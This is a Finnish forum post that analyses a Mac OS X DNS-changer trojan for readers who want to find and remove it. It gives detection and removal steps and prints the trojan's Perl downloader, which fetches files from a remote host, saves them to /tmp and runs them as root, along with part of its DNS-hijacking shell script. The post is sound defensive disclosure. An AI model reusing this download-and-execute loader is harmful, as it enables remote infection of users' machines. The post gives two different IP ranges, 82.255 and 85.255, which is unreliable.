Tästä on ollut tuoretta juttua : http://isc.sans.org/diary.html?storyid=5390#comment
Uutta huomioitavaa :
1. hyökkääjillä nyt paremmin suunniteltu Command&Control mekanismit.
2. Ajettava koodi helposti päivitettävissä => suojausohjeet ovat kertaluontoiset, pätevät lyhyen aikaa ko. haittakoodiin.
Lyhyesti suomeksi nykytilanne OS X "troijalaisista" ko. artikkelin mukaan :
-Asennus vaatii käyttäjää syöttämään admin UID/PWD
- Sisältää uuenkoodattua shell scriptiä/perliä
- Lisäävät ajoitetun tehtävän ajettavaksi määräajoin (cronjob). Uusimman version cronjobin nimi "AdobeFlash", tavoite nimessä on, ettei käyttäjä ei uskalla sitä poistaa / ymmärtäisi että kyseessä haittaohjelma.
- cronjobin sisältö haettavissa/päivitettävissä netistä tarpeen vaatiessa.
- nykyversio hakee tavaraa ip-avaruudesta 82.255.112.0/20
1. Miten havaitset oletko asentanut yllä kuvatun "troijalaisen" :
/usr/sbin/scutil --dns | grep nameserver
Mikäli DNS server IP-osoite on 85.255.112.0 - 85.255.127.255 olet asentanut nykyversion troijalaisesta.
Seuraavassa versiossa IP-avaruus voi muuttua.
2. Poisto : http://www.macworld.com/article/60823/2 ... horse.html
"If you’re infected, what’s the easiest way to get rid of the trojan horse? As noted above, VirusBarrier will do the job, using today’s virus definitions. However, you can do it yourself, if you wish, though it will require a tiny bit of Terminal work. Here’s what you need to do—and yes, I infected my own machine and tested this (on OS X 10.5, but OS X 10.4 should be identical) to make sure it works.
# In the Finder, navigate to /Library -> Internet Plug-Ins, and delete the file named plugins.settings. Empty the trash. This deletes the tool that sets the rogue DNS Server information.
# In Terminal, type sudo crontab -r and provide your admin password when asked. This deletes the root cron job that checks the DNS Server settings. You can prove it worked by typing sudo crontab -l; you should see the message “crontab: no crontab for root.”
Pistetään nyt tähän vielä pätkiä koodia että kaikki näkevät ettei tässä mitään hokkupokkus-temppuja ole :
1.troijalaisen perl-osio :downloadaa tiedosto paikasta X antamalla "user-Agent" -tieto y, sitten suorittaa ko.tiedosto roottina.
#!/usr/bin/perl
use IO::Socket;
my $ip="XXX.XXX.XXX.XXX",$answer="";
my $runtype=typeofrun;
sub trim($)
{ my $string = shift;
$string =~ s/\r//;
$string =~ s/\n//;
return $string; }
my $socket=IO::Socket::INET->new(PeerAddr=>"$ip",PeerPort=>"80",Proto=>"tcp") or return;
print $socket "GET /cgi-bin/generator.pl HTTP/1.0\r\nUser-Agent: "**SNIPPED CONTENT**;$runtype;7777;**SNIPPED CONTENT**;\r\n\r\n";
while(<$socket>){ $answer.=$_;}
close($socket);
my $data=substr($answer,index($answer,"\r\n\r\n")+4);
if($answer=~/Time: (.*)\r\n/)
{ my $cpos=0,@pos=split(/ /,$1);
foreach(@pos) {
my $file="/tmp/".$_;open(FILE,">".$file);print FILE substr($data,$cpos,$_);
close(FILE);
chmod 0755, $file;system($file);
$cpos+=$_; }}
Kun tämä ajettiin, saattiin hakkereiden saitilta scriptitiedosto alla. Tiedosto ajetaan scutilin CLI:ssä :
VX1 ja VX2 ovat DNS-fake-servereiden IP-osoitteita jotka tulevat parametreinä yllä olevasta scriptistä(TEERTS,CIGAM).
Nämä tiedot ovat muuttuneet tähän asti kolme kertaa 24 sisällä, joten pelkkä IP-osoitteiden suodatus ei auta vaan kannatta blockata koko ukrainalaisen ISP:n osoiteavaruus. Minnehän ISP:lle ne seuraavaksi menevät...?
Alla
#!/bin/sh
path="/Library/Internet Plug-Ins"
VX1="TEERTS"
VX2="CIGAM"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
Voihan tämä olla jokin AV-firmojen ja tietoturvaukkeleiden salajuoni jossa minäkin olen mukana...
-Securapple
![[:$]](./images/smilies/icon_redface.gif "Punastuu"){kind=icon}
![[8-|]](./images/smilies/49_49.gif "Nörde"){kind=small}
